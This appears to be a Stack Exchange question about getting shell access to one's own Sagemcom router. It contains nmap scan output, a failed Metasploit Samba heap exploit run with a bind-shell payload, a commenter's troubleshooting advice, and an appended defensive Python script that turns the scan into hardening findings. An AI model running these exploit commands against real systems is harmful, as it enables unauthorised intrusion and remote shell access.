5

I'm trying to gain shell access to my home router/gateway, so I decided to use metasploit and nmap to find if there were any vulnerabilities that I could use:

[marcel@GLaDOS ~]$ sudo nmap -sS -Pn -A 192.168.2.1

Starting Nmap 7.50 ( https://nmap.org ) at 2017-06-21 14:30 EDT
Nmap scan report for mynetwork (192.168.2.1)
Host is up (0.012s latency).
Not shown: 844 closed ports, 148 filtered ports
PORT      STATE SERVICE     VERSION
53/tcp    open  domain      dnsmasq 2.55
| dns-nsid: 
|_  bind.version: dnsmasq-2.55
80/tcp    open  http        lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=self-signedKey/organizationName=Sagemcom Ca/countryName=FR
| Not valid before: 2011-10-14T12:32:29
|_Not valid after:  2111-09-20T12:32:29
|_ssl-date: 2017-06-21T18:33:31+00:00; +14s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp  open  socks?
| fingerprint-strings: 
|   GenericLines, HTTPOptions, RTSPRequest, SIPOptions, Socks5: 
|     HTTP/1.1 200 BAD_REQUEST_400
|     Server: CPE-iTrace-Server-1.7b
|     Content-Type: text/html
|     Transfer-Encoding: chunked
|_    Connection: close
9000/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0)
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1080-TCP:V=7.50%I=7%D=6/21%Time=594ABB6A%P=x86_64-unknown-linux-gnu
SF:%r(GenericLines,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20C
SF:PE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encodi
SF:ng:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(Socks5,88,"HTTP/1\.1
SF:\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nCon
SF:tent-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:
SF:\x20close\r\n\r\n")%r(HTTPOptions,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_4
SF:00\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\
SF:r\nTransfer-Encoding:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(RT
SF:SPRequest,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTr
SF:ace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encoding:\x2
SF:0chunked\r\nConnection:\x20close\r\n\r\n")%r(SIPOptions,88,"HTTP/1\.1\x
SF:20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nConte
SF:nt-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:\x
SF:20close\r\n\r\n");
MAC Address: 40:F2:01:EE:09:CD (Sagemcom Broadband SAS)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:   
OS:SCAN(V=7.50%E=4%D=6/21%OT=53%CT=135%CU=32451%PV=Y%DS=1%DC=D%G=Y%M=40F201
OS:%TM=594ABC0C%P=x86_64-unknown-linux-gnu)SEQ(SP=C7%GCD=1%ISR=D3%TI=Z%CI=Z
OS:%TS=U)SEQ(SP=C6%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=M5B4NNSNW4%O2=M5
OS:B4NNSNW4%O3=M5B4NW4%O4=M5B4NNSNW4%O5=M5B4NNSNW4%O6=M5B4NNS)WIN(W1=16D0%W
OS:2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NN
OS:SNW4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T
OS:=40%W=16D0%S=O%A=S+%F=AS%O=M5B4NNSNW4%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:linux:linux_kernel:2.6.28.8

Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
|_nbstat: NetBIOS name: SAGEMCOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.24)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-06-21T14:33:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT      ADDRESS
1   12.11 ms mynetwork (192.168.2.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.68 seconds

I found out that the router is running Linux and using Samba 3.0.24, which is fairly old. I then found this Metasploit exploit which I thought could work: https://www.exploit-db.com/exploits/16859/

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.2.1
RHOST => 192.168.2.1
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] 192.168.2.1:445 - Creating nop sled....
[*] 192.168.2.1:445 - Trying to exploit Samba with address 0xffffe410...
[*] 192.168.2.1:445 - Connecting to the SMB service...
[*] 192.168.2.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc] ...
[-] 192.168.2.1:445 - Exploit failed: Rex::Proto::DCERPC::Exceptions::BindError Failed to bind. Could not bind to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc]
[*] Exploit completed, but no session was created.

Unfortunately, I'm getting a BindError, and I can't seem to figure out the problem. If anybody could help me fix it or understand it further, that would be great!

The device doesn't have the required dcerpc endpoint you are trying to connect to. Use auxiliary/scanner/dcerpc/endpoint_mapper on the device and it is going to show you all the endpoints you can bind. You will see that there won't be any 12345778-1234-abcd-ef00-0123456789ab endpoint available for binding. – void_in Jun 21 '17 at 20:48

Thanks for the suggestion! However, with that I'm getting the error `Could not obtain the endpoint list: Invalid packet. DCERPC response packet is incomplete` for ports `139` and `445` on host `192.168.2.1`. Should I be using another port? – marceloneil Jun 22 '17 at 21:02
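As an added, defender-oriented example that is not part of the original question or its comments: the scan output posted above already contains the findings that matter for hardening the gateway (an end-of-life Samba 3.0.x branch on 445/tcp, share-level authentication, SMB message signing disabled, no SMBv2 support, and an unidentified listener on 1080/tcp). The script below parses nmap's normal-format output for the port table and the smb-security-mode host-script block and turns them into a checklist for the device owner. SAMPLE_SCAN is a trimmed copy of the posted scan, embedded so the parser runs offline; the function names and the finding texts are my own.

```python
import re

# Constructed sample: a trimmed copy of the nmap normal-format output shown in
# the question, embedded here so the parser can be run offline.
SAMPLE_SCAN = """\
PORT      STATE SERVICE     VERSION
53/tcp    open  domain      dnsmasq 2.55
80/tcp    open  http        lighttpd
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp  open  socks?
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

# One row of nmap's port table: "445/tcp   open  netbios-ssn Samba smbd 3.0.24 (...)"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# One key/value line inside an NSE script block: "|   account_used: guest"
SCRIPT_KV_RE = re.compile(r"^\|_?\s+(\w+):\s*(.*)$")


def parse_ports(text):
    """Return the port table as a list of dicts (port, proto, state, service, version)."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip()})
    return ports


def parse_script_block(text, script_name):
    """Return the key/value lines of one NSE host-script block, e.g. smb-security-mode."""
    result = {}
    in_block = False
    for line in text.splitlines():
        if line.startswith(f"| {script_name}:"):
            in_block = True
            continue
        if in_block:
            m = SCRIPT_KV_RE.match(line)
            if not m:
                break                      # left the block without a "|_" terminator
            result[m.group(1)] = m.group(2).strip()
            if line.startswith("|_"):
                break                      # "|_" marks the last line of a script block
    return result


def assess(text):
    """Turn the scan into a list of hardening findings for the device owner."""
    findings = []
    for p in parse_ports(text):
        if p["state"] == "open" and "Samba smbd 3.0." in p["version"]:
            findings.append(f"{p['port']}/{p['proto']}: Samba 3.0.x is end-of-life; "
                            "update the firmware or disable SMB on the gateway")
        if p["state"] == "open" and p["service"].endswith("?"):
            # nmap appends "?" when the service name is only a guess
            findings.append(f"{p['port']}/{p['proto']}: unidentified service ({p['service']}); "
                            "confirm what listens here before leaving it exposed")
    smb = parse_script_block(text, "smb-security-mode")
    if smb.get("authentication_level", "").startswith("share"):
        findings.append("SMB uses share-level authentication: no per-user credentials; "
                        "switch to user-level authentication or disable the share")
    if smb.get("message_signing", "").startswith("disabled"):
        findings.append("SMB message signing disabled: sessions can be tampered with "
                        "in transit; enable signing if the firmware allows it")
    if "Server doesn't support SMBv2" in text:
        findings.append("only SMBv1 is offered: disable SMB on the gateway or restrict it "
                        "to the LAN and move file sharing to a device that supports SMBv2+")
    return findings


if __name__ == "__main__":
    for p in parse_ports(SAMPLE_SCAN):
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<12} {p['version']}")
    print()
    for f in assess(SAMPLE_SCAN):
        print("FINDING:", f)
```

Run it on a saved `nmap -oN` file by reading the file into `assess()` instead of `SAMPLE_SCAN`; the script block parser stops at the `|_` line, so it is not confused by the `|_smbv2-enabled` line that follows the smb-security-mode block.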

0 Answers